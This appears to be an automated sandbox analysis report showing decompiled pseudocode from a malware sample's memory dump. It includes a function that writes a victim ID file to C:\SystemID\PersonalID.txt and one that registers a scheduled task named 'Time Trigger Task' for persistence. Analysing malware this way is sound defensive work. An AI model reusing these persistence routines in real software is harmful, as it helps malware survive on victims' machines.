
Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00418000(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _t99;
				signed int _t102;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr* _t116;
				intOrPtr _t124;
				intOrPtr* _t136;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t183;
				intOrPtr _t185;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				intOrPtr _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t204;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				intOrPtr* _t213;
				intOrPtr* _t219;
				void* _t226;

				_push(__ecx);
				_t219 = __ecx;
				_t213 = _a4;
				_t188 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t188 < _t213) {
					L102:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *_t188;
				} else {
					_t183 = _a16;
					_t99 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t99 < _t183) {
						goto L102;
					} else {
						_t188 = _t188 - _t213;
						_t207 =  <  ? _t188 : _a8;
						_a8 = _t207;
						_t185 =  <  ? _t99 - _t183 : _a20;
						_t102 =  *((intOrPtr*)(__ecx + 0x10)) - _t207;
						_v8 = _t102;
						if((_t102 | 0xffffffff) - _t185 <= _v8) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L102;
						} else {
							_t189 = _t188 - _t207;
							_t107 = _v8 + _t185;
							_a20 = _t189;
							_v8 = _t107;
							if( *((intOrPtr*)(__ecx + 0x10)) < _t107) {
								_push(0);
								E00415810(_t185, __ecx, _t213, _t107);
								_t189 = _a20;
								_t207 = _a8;
							}
							_t108 = _a12;
							if(_t219 == _t108) {
								__eflags = _t185 - _t207;
								if(_t185 > _t207) {
									__eflags = _a16 - _t213;
									if(_a16 > _t213) {
										__eflags = _t213 + _t207 - _a16;
										_t110 =  *((intOrPtr*)(_t219 + 0x14));
										if(_t213 + _t207 > _a16) {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_t190 = _t219;
											} else {
												_t190 =  *_t219;
											}
											__eflags = _t207;
											if(_t207 != 0) {
												__eflags = _a12 + _a16;
												E004205A0(_t190 + _t213, _a12 + _a16, _t207);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t111 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_t191 = _t219;
											} else {
												_t191 =  *_t219;
											}
											_t112 = _a20;
											__eflags = _t112;
											if(_t112 != 0) {
												__eflags = _t191 + _t213 + _t185;
												E004205A0(_t191 + _t213 + _t185, _a12 + _t213 + _t207, _t112);
												_t226 = _t226 + 0xc;
											}
											_t113 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_t208 = _t219;
											} else {
												_t208 =  *_t219;
											}
											_t192 = _a8;
											_t115 = _t185 - _t192;
											__eflags = _t115;
											if(_t115 != 0) {
												_push(_t115);
												_push(_a12 + _a16 + _t185);
												_t124 = _t213 + _t208 + _t192;
												__eflags = _t124;
												goto L96;
											}
										} else {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a4 = _t219;
											} else {
												_a4 =  *_t219;
												_t207 = _a8;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t189;
											if(_t189 != 0) {
												__eflags = _a12 + _t213 + _t185;
												E004205A0(_a12 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t197 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t136 = _t219;
											} else {
												_t136 =  *_t219;
											}
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t198 = _t219;
											} else {
												_t198 =  *_t219;
											}
											__eflags = _t185;
											if(_t185 != 0) {
												_push(_t185);
												_push(_t136 - _t207 + _a16 + _t185);
												_t124 = _t198 + _t213;
												goto L96;
											}
										}
									} else {
										_t148 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a4 = _t219;
										} else {
											_a4 =  *_t219;
											_t207 = _a8;
										}
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a8 = _t219;
										} else {
											_a8 =  *_t219;
										}
										__eflags = _t189;
										if(_t189 != 0) {
											__eflags = _a8 + _t213 + _t185;
											E004205A0(_a8 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
											_t226 = _t226 + 0xc;
										}
										_t149 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t210 = _t219;
										} else {
											_t210 =  *_t219;
										}
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t199 = _t219;
										} else {
											_t199 =  *_t219;
										}
										__eflags = _t185;
										if(_t185 != 0) {
											_push(_t185);
											_push(_a16 + _t210);
											_t124 = _t199 + _t213;
											goto L96;
										}
									}
								} else {
									_t160 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_a4 = _t219;
									} else {
										_a4 =  *_t219;
									}
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_t200 = _t219;
									} else {
										_t200 =  *_t219;
									}
									__eflags = _t185;
									if(_t185 != 0) {
										__eflags = _a4 + _a16;
										E004205A0(_t200 + _t213, _a4 + _a16, _t185);
										_t207 = _a8;
										_t226 = _t226 + 0xc;
									}
									_t161 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_a8 = _t219;
									} else {
										_a8 =  *_t219;
									}
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_t201 = _t219;
									} else {
										_t201 =  *_t219;
									}
									_t162 = _a20;
									__eflags = _t162;
									if(_t162 != 0) {
										_push(_t162);
										_push(_a8 + _t213 + _t207);
										_t124 = _t201 + _t213 + _t185;
										L96:
										_push(_t124);
										E004205A0();
										goto L97;
									}
								}
							} else {
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a8 = _t219;
								} else {
									_a8 =  *_t219;
									_t213 = _a4;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a20 = _t219;
								} else {
									_a20 =  *_t219;
									_t213 = _a4;
								}
								if(_t189 != 0) {
									E004205A0(_a20 + _t213 + _t185, _a8 + _t213 + _t207, _t189);
									_t108 = _a12;
									_t226 = _t226 + 0xc;
								}
								if( *((intOrPtr*)(_t108 + 0x14)) >= 0x10) {
									_t108 =  *_t108;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_t204 = _t219;
								} else {
									_t204 =  *_t219;
								}
								if(_t185 != 0) {
									E0042D8D0(_t204 + _t213, _t108 + _a16, _t185);
									L97:
								}
							}
							_t193 = _v8;
							 *(_t219 + 0x10) = _t193;
							if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
								_t116 = _t219;
								 *((char*)(_t116 + _t193)) = 0;
								return _t116;
							} else {
								 *((char*)( *_t219 + _t193)) = 0;
								return _t219;
							}
						}
					}
				}
			}

0x00418003
0x00418005
0x00418008
0x0041800b
0x00418010
0x00418342
0x00418342
0x00418347
0x0041834c
0x0041834d
0x0041834e
0x0041834f
0x00418352
0x00418016
0x0041801a
0x0041801d
0x00418022
0x00000000
0x00418028
0x0041802b
0x0041802f
0x00418039
0x0041803c
0x00418042
0x00418044
0x0041804f
0x00418338
0x0041833d
0x00000000
0x00418055
0x00418058
0x0041805a
0x0041805c
0x0041805f
0x00418065
0x00418067
0x0041806c
0x00418071
0x00418074
0x00418074
0x00418077
0x0041807c
0x004180f3
0x004180f5
0x0041816a
0x0041816d
0x004181e3
0x004181e6
0x004181e9
0x0041825e
0x00418261
0x0041826a
0x00418263
0x00418265
0x00418265
0x0041826d
0x00418270
0x00418276
0x00418272
0x00418272
0x00418272
0x00418278
0x0041827a
0x0041827f
0x00418288
0x0041828d
0x00418290
0x00418290
0x00418293
0x00418296
0x00418299
0x004182a2
0x0041829b
0x0041829d
0x0041829d
0x004182a5
0x004182a8
0x004182ae
0x004182aa
0x004182aa
0x004182aa
0x004182b0
0x004182b3
0x004182b5
0x004182c3
0x004182c6
0x004182cb
0x004182cb
0x004182ce
0x004182d1
0x004182d4
0x004182dd
0x004182d6
0x004182d8
0x004182d8
0x004182e0
0x004182e3
0x004182e9
0x004182e5
0x004182e5
0x004182e5
0x004182eb
0x004182f0
0x004182f0
0x004182f2
0x004182f4
0x004182fd
0x00418302
0x00418302
0x00000000
0x00418302
0x004181eb
0x004181eb
0x004181ee
0x004181fa
0x004181f0
0x004181f2
0x004181f5
0x004181f5
0x004181fd
0x00418200
0x00418209
0x00418202
0x00418204
0x00418204
0x0041820c
0x0041820e
0x0041821e
0x00418221
0x00418226
0x00418229
0x00418229
0x0041822c
0x0041822f
0x00418232
0x00418238
0x00418234
0x00418234
0x00418234
0x0041823a
0x0041823d
0x00418243
0x0041823f
0x0041823f
0x0041823f
0x00418245
0x00418247
0x00418254
0x00418255
0x00418256
0x00000000
0x00418256
0x00418247
0x0041816f
0x0041816f
0x00418172
0x00418175
0x00418181
0x00418177
0x00418179
0x0041817c
0x0041817c
0x00418184
0x00418187
0x00418190
0x00418189
0x0041818b
0x0041818b
0x00418193
0x00418195
0x004181a5
0x004181a8
0x004181ad
0x004181ad
0x004181b0
0x004181b3
0x004181b6
0x004181bc
0x004181b8
0x004181b8
0x004181b8
0x004181be
0x004181c1
0x004181c7
0x004181c3
0x004181c3
0x004181c3
0x004181c9
0x004181cb
0x004181d6
0x004181d7
0x004181d8
0x00000000
0x004181d8
0x004181cb
0x004180f7
0x004180f7
0x004180fa
0x004180fd
0x00418106
0x004180ff
0x00418101
0x00418101
0x00418109
0x0041810c
0x00418112
0x0041810e
0x0041810e
0x0041810e
0x00418114
0x00418116
0x0041811b
0x00418124
0x00418129
0x0041812c
0x0041812c
0x0041812f
0x00418132
0x00418135
0x0041813e
0x00418137
0x00418139
0x00418139
0x00418141
0x00418144
0x0041814a
0x00418146
0x00418146
0x00418146
0x0041814c
0x0041814f
0x00418151
0x00418157
0x0041815f
0x00418163
0x00418304
0x00418304
0x00418305
0x00000000
0x00418305
0x00418151
0x0041807e
0x00418082
0x0041808e
0x00418084
0x00418086
0x00418089
0x00418089
0x00418095
0x004180a1
0x00418097
0x00418099
0x0041809c
0x0041809c
0x004180a6
0x004180b9
0x004180be
0x004180c1
0x004180c1
0x004180c8
0x004180ca
0x004180ca
0x004180d0
0x004180d6
0x004180d2
0x004180d2
0x004180d2
0x004180da
0x004180e9
0x0041830a
0x0041830a
0x004180da
0x00418311
0x00418314
0x00418318
0x0041832a
0x0041832e
0x00418335
0x0041831a
0x0041831d
0x00418327
0x00418327
0x00418318
0x0041804f
0x00418022

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

string too long, xrefs: 00418338
invalid string position, xrefs: 00418342

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040C740(char _a4, intOrPtr _a20, intOrPtr _a24) {
				struct _SECURITY_ATTRIBUTES* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				struct _SECURITY_ATTRIBUTES* _v56;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t86;
				void* _t92;
				void* _t95;
				void* _t96;
				signed int _t98;
				struct _SECURITY_ATTRIBUTES** _t101;
				DWORD* _t109;
				void* _t117;
				signed int _t121;
				intOrPtr _t123;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t128;
				signed int _t138;
				intOrPtr _t141;
				signed int _t142;
				signed int _t143;
				intOrPtr _t144;
				signed int _t146;
				signed int _t147;
				signed int _t150;
				intOrPtr _t151;
				void* _t153;
				void* _t155;
				void* _t156;

				_push(0xffffffff);
				_push(0x4ca7b8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t151;
				_v8 = 0;
				_t121 = 0;
				_t138 = 0;
				_v32 = 0;
				_t141 = 0;
				_v28 = 0;
				_v24 = 0;
				_v8 = 1;
				_t77 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "r");
				_t153 = _t151 - 0x130 + 8;
				_v20 = _t77;
				if(_t77 == 0) {
					L28:
					_t142 = _t121;
					if(_t121 == _t138) {
						L32:
						CreateDirectoryW(L"C:\\SystemID", 0);
						_t79 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "w");
						_t153 = _t153 + 8;
						_v20 = _t79;
						if(_t79 != 0) {
							_t143 = _t121;
							__eflags = _t121 - _t138;
							if(_t121 == _t138) {
								L47:
								__eflags = _a24 - 8;
								_t144 = _v20;
								_t81 =  >=  ? _a4 :  &_a4;
								_push(_t144);
								_push( >=  ? _a4 :  &_a4);
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_push("\n");
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_t79 = E00423A38(_t121, _t138, _t144, __eflags);
								_t153 = _t153 + 0x14;
								__eflags = _t121;
								if(_t121 == 0) {
									L54:
									if(_a24 >= 8) {
										_t79 = L00422587(_a4);
									}
									 *[fs:0x0] = _v16;
									return _t79;
								}
								_t146 = _t121;
								__eflags = _t121 - _t138;
								if(_t121 == _t138) {
									L53:
									_t79 = L00422587(_t121);
									_t153 = _t153 + 4;
									goto L54;
								}
								do {
									__eflags =  *((intOrPtr*)(_t146 + 0x14)) - 8;
									if( *((intOrPtr*)(_t146 + 0x14)) >= 8) {
										L00422587( *_t146);
										_t153 = _t153 + 4;
									}
									 *((intOrPtr*)(_t146 + 0x14)) = 7;
									 *(_t146 + 0x10) = 0;
									 *_t146 = 0;
									_t146 = _t146 + 0x18;
									__eflags = _t146 - _t138;
								} while (_t146 != _t138);
								goto L53;
							}
							_t123 = _v20;
							do {
								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 8;
								if(__eflags < 0) {
									_t86 = _t143;
								} else {
									_t86 =  *_t143;
								}
								_push(_t123);
								_push(_t86);
								E004228FD(_t123, _t135, _t138, _t143, __eflags);
								_t143 = _t143 + 0x18;
								_t153 = _t153 + 8;
								__eflags = _t143 - _t138;
							} while (_t143 != _t138);
							_t121 = _v32;
							goto L47;
						}
						L33:
						if(_t121 == 0) {
							goto L54;
						}
						_t147 = _t121;
						if(_t121 == _t138) {
							goto L53;
						}
						do {
							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
								L00422587( *_t147);
								_t153 = _t153 + 4;
							}
							 *((intOrPtr*)(_t147 + 0x14)) = 7;
							 *(_t147 + 0x10) = 0;
							 *_t147 = 0;
							_t147 = _t147 + 0x18;
						} while (_t147 != _t138);
						goto L53;
					}
					while(1) {
						_t91 =  >=  ? _a4 :  &_a4;
						_t79 = E00414C60(_t142,  >=  ? _a4 :  &_a4, 0, _a20);
						if(_t79 != 0xffffffff) {
							goto L33;
						}
						_t142 = _t142 + 0x18;
						if(_t142 != _t138) {
							continue;
						}
						goto L32;
					}
					goto L33;
				}
				_t92 = E00420546(_t77);
				_t155 = _t153 + 4;
				_t158 = _t92;
				if(_t92 != 0) {
					L27:
					_push(_v20);
					E00423A38(_t121, _t138, _t141, _t166);
					_t153 = _t155 + 4;
					goto L28;
				} else {
					do {
						_push(_v20);
						_push(0x7e);
						_push( &_v316);
						_t95 = E00421101(_t121, _t138, _t141, _t158);
						_t156 = _t155 + 0xc;
						if(_t95 == 0) {
							goto L26;
						}
						_v36 = 7;
						_v40 = 0;
						_v56 = 0;
						if(_v316 != 0) {
							_t126 =  &_v316;
							_t14 = _t126 + 2; // 0x3
							_t135 = _t14;
							do {
								_t98 =  *_t126;
								_t126 = _t126 + 2;
								__eflags = _t98;
							} while (_t98 != 0);
							_t127 = _t126 - _t135;
							__eflags = _t127;
							_t128 = _t127 >> 1;
							goto L9;
						} else {
							_t128 = 0;
							L9:
							_push(_t128);
							_t129 =  &_v56;
							E00415C10(_t121,  &_v56, _t138, _t141,  &_v316);
							_t101 =  &_v56;
							_v8 = 2;
							if(_t101 >= _t138 || _t121 > _t101) {
								__eflags = _t138 - _t141;
								if(_t138 == _t141) {
									E00414F70(_t121,  &_v32, _t138, _t129);
									_t138 = _v28;
									_t121 = _v32;
								}
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)(_t138 + 0x14)) = 7;
									 *(_t138 + 0x10) = 0;
									 *_t138 = 0;
									__eflags = _v36 - 8;
									if(_v36 >= 8) {
										 *_t138 = _v56;
										_v56 = 0;
									} else {
										_t109 =  &(_v40->nLength);
										__eflags = _t109;
										if(_t109 != 0) {
											E004205A0(_t138,  &_v56, _t109 + _t109);
											_t156 = _t156 + 0xc;
										}
									}
									 *(_t138 + 0x10) = _v40;
									 *((intOrPtr*)(_t138 + 0x14)) = _v36;
									__eflags = 0;
									_v36 = 7;
									_v40 = 0;
									_v56 = 0;
								}
							} else {
								_t132 = _t101 - _t121;
								_t135 = 0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2;
								_t150 = (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2);
								if(_t138 == _v24) {
									E00414F70(_t121,  &_v32, _t138, _t132);
									_t138 = _v28;
									_t121 = _v32;
								}
								_t117 = _t121 + (_t150 + _t150 * 2) * 8;
								if(_t138 != 0) {
									SetUserObjectSecurity(_t117, ??, ??);
								}
							}
							_t138 = _t138 + 0x18;
							_v8 = 1;
							_v28 = _t138;
							if(_v36 >= 8) {
								L00422587(_v56);
								_t156 = _t156 + 4;
							}
							_t141 = _v24;
						}
						L26:
						_t96 = E00420546(_v20);
						_t155 = _t156 + 4;
						_t166 = _t96;
					} while (_t96 == 0);
					goto L27;
				}
			}

0x0040c743
0x0040c745
0x0040c750
0x0040c751
0x0040c761
0x0040c768
0x0040c76a
0x0040c76c
0x0040c76f
0x0040c771
0x0040c774
0x0040c781
0x0040c785
0x0040c78a
0x0040c78d
0x0040c792
0x0040c911
0x0040c911
0x0040c915
0x0040c944
0x0040c94b
0x0040c95b
0x0040c960
0x0040c963
0x0040c968
0x0040c9af
0x0040c9b1
0x0040c9b3
0x0040c9d8
0x0040c9d8
0x0040c9df
0x0040c9e2
0x0040c9e6
0x0040c9e7
0x0040c9e8
0x0040c9ed
0x0040c9ee
0x0040c9f3
0x0040c9f8
0x0040c9f9
0x0040c9fe
0x0040ca01
0x0040ca03
0x0040ca43
0x0040ca47
0x0040ca4c
0x0040ca51
0x0040ca59
0x0040ca64
0x0040ca64
0x0040ca05
0x0040ca07
0x0040ca09
0x0040ca3a
0x0040ca3b
0x0040ca40
0x00000000
0x0040ca40
0x0040ca10
0x0040ca10
0x0040ca14
0x0040ca18
0x0040ca1d
0x0040ca1d
0x0040ca22
0x0040ca29
0x0040ca30
0x0040ca33
0x0040ca36
0x0040ca36
0x00000000
0x0040ca10
0x0040c9b5
0x0040c9b8
0x0040c9b8
0x0040c9bc
0x0040c9c2
0x0040c9be
0x0040c9be
0x0040c9be
0x0040c9c4
0x0040c9c5
0x0040c9c6
0x0040c9cb
0x0040c9ce
0x0040c9d1
0x0040c9d1
0x0040c9d5
0x00000000
0x0040c9d5
0x0040c96a
0x0040c96c
0x00000000
0x00000000
0x0040c972
0x0040c976
0x00000000
0x00000000
0x0040c980
0x0040c984
0x0040c988
0x0040c98d
0x0040c98d
0x0040c992
0x0040c999
0x0040c9a0
0x0040c9a3
0x0040c9a6
0x00000000
0x0040c9aa
0x0040c920
0x0040c92c
0x0040c933
0x0040c93b
0x00000000
0x00000000
0x0040c93d
0x0040c942
0x00000000
0x00000000
0x00000000
0x0040c942
0x00000000
0x0040c920
0x0040c799
0x0040c79e
0x0040c7a1
0x0040c7a3
0x0040c906
0x0040c906
0x0040c909
0x0040c90e
0x00000000
0x0040c7b0
0x0040c7b0
0x0040c7b0
0x0040c7b9
0x0040c7bb
0x0040c7bc
0x0040c7c1
0x0040c7c6
0x00000000
0x00000000
0x0040c7ce
0x0040c7d5
0x0040c7dc
0x0040c7e7
0x0040c7ed
0x0040c7f3
0x0040c7f3
0x0040c7f6
0x0040c7f6
0x0040c7f9
0x0040c7fc
0x0040c7fc
0x0040c801
0x0040c801
0x0040c803
0x00000000
0x0040c7e9
0x0040c7e9
0x0040c805
0x0040c805
0x0040c80d
0x0040c810
0x0040c815
0x0040c818
0x0040c81e
0x0040c861
0x0040c863
0x0040c869
0x0040c86e
0x0040c871
0x0040c871
0x0040c874
0x0040c876
0x0040c87a
0x0040c881
0x0040c888
0x0040c88b
0x0040c88f
0x0040c8ac
0x0040c8ae
0x0040c891
0x0040c894
0x0040c894
0x0040c895
0x0040c89f
0x0040c8a4
0x0040c8a4
0x0040c895
0x0040c8b8
0x0040c8be
0x0040c8c1
0x0040c8c3
0x0040c8ca
0x0040c8d1
0x0040c8d1
0x0040c824
0x0040c82b
0x0040c82f
0x0040c837
0x0040c83c
0x0040c842
0x0040c847
0x0040c84a
0x0040c84a
0x0040c850
0x0040c855
0x0040c85a
0x0040c85a
0x0040c855
0x0040c8d5
0x0040c8d8
0x0040c8e0
0x0040c8e3
0x0040c8e8
0x0040c8ed
0x0040c8ed
0x0040c8f0
0x0040c8f0
0x0040c8f3
0x0040c8f6
0x0040c8fb
0x0040c8fe
0x0040c8fe
0x00000000
0x0040c7b0

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
SetUserObjectSecurity.USER32 ref: 0040C85A
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID, xrefs: 0040C946
C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: CreateDirectoryObjectSecurityUser__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 3961525514-54166481
Opcode ID: b56586a0f40a47d2a110a6b2cb5378090d00edeb6589163c5e05a767808c7587
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: b56586a0f40a47d2a110a6b2cb5378090d00edeb6589163c5e05a767808c7587
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160
comstringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040DAC0(char _a4, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				intOrPtr _v60;
				intOrPtr _v76;
				short _v84;
				intOrPtr _v88;
				char _v92;
				short _v20572;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t87;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr _t129;

				 *[fs:0x0] = _t129;
				_t61 = E0042F7C0(0x504c);
				_v8 = 0;
				__imp__CoInitialize(0,  *[fs:0x0], 0x4ca948, 0xffffffff);
				if(_t61 >= 0) {
					__imp__CoCreateInstance(0x4d4f6c, 0, 1, 0x4d4f3c,  &_v24);
					_t63 = _v24;
					_push( &_v20);
					_push(0x4d4f8c);
					_push(0x4d4f9c);
					_push(L"Time Trigger Task");
					_push(_t63);
					if( *((intOrPtr*)( *_t63 + 0x20))() != 0) {
						_t98 = _v24;
						 *((intOrPtr*)( *_t98 + 0x1c))(_t98, L"Time Trigger Task");
						_t100 = _v24;
						 *((intOrPtr*)( *_t100 + 0x20))(_t100, L"Time Trigger Task", 0x4d4f9c, 0x4d4f8c,  &_v20);
					}
					_t65 = _v20;
					 *((intOrPtr*)( *_t65))(_t65, 0x4cf2e8,  &_v36);
					_t67 = _v36;
					 *((intOrPtr*)( *_t67 + 0x18))(_t67, 0, 1);
					_t69 = _v20;
					 *((intOrPtr*)( *_t69))(_t69, 0x4d4f7c,  &_v44);
					_t71 = _v20;
					 *((intOrPtr*)( *_t71 + 0x78))(_t71, 0x500078, 0);
					_t73 = _v20;
					_t122 =  >=  ? _a4 :  &_a4;
					 *((intOrPtr*)( *_t73 + 0x80))(_t73,  >=  ? _a4 :  &_a4);
					_t75 = _v20;
					 *((intOrPtr*)( *_t75 + 0x88))(_t75, L"--Task");
					_t78 =  >=  ? _a4 :  &_a4;
					lstrcpyW( &_v20572,  >=  ? _a4 :  &_a4);
					PathRemoveFileSpecW( &_v20572);
					_t83 = _v20;
					 *((intOrPtr*)( *_t83 + 0x90))(_t83,  &_v20572);
					_t85 = _v20;
					 *((intOrPtr*)( *_t85 + 0x48))(_t85, L"Comment");
					_t87 = _v20;
					_v28 = 0;
					_v32 = 0;
					_v40 = 0;
					 *((intOrPtr*)( *_t87 + 0xc))(_t87,  &_v40,  &_v28);
					E0042B420( &_v92, 0, 0x30);
					_v88 = 0xb07e2;
					_v92 = 0x30;
					_t129 = _t129 + 0xc;
					_v84 = 1;
					_t93 = _v28;
					_v76 = 0x21000c;
					_v60 = 0;
					 *((intOrPtr*)( *_t93 + 0xc))(_t93,  &_v92);
					_t95 = _v20;
					 *((intOrPtr*)( *_t95))(_t95, 0x4cf2e8,  &_v32);
					_t97 = _v32;
					_t61 =  *((intOrPtr*)( *_t97 + 0x18))(_t97, 0, 0);
					__imp__CoUninitialize();
				}
				if(_a24 >= 8) {
					_t61 = L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t61;
			}

0x0040dad6
0x0040dadd
0x0040dae4
0x0040daeb
0x0040daf3
0x0040db0b
0x0040db11
0x0040db17
0x0040db18
0x0040db1d
0x0040db24
0x0040db29
0x0040db2f
0x0040db31
0x0040db3c
0x0040db3f
0x0040db58
0x0040db58
0x0040db5b
0x0040db6a
0x0040db6c
0x0040db76
0x0040db79
0x0040db88
0x0040db8a
0x0040db97
0x0040db9a
0x0040dba4
0x0040dbac
0x0040dbb2
0x0040dbbd
0x0040dbca
0x0040dbd6
0x0040dbe3
0x0040dbe9
0x0040dbf6
0x0040dbfc
0x0040dc07
0x0040dc0a
0x0040dc11
0x0040dc1b
0x0040dc22
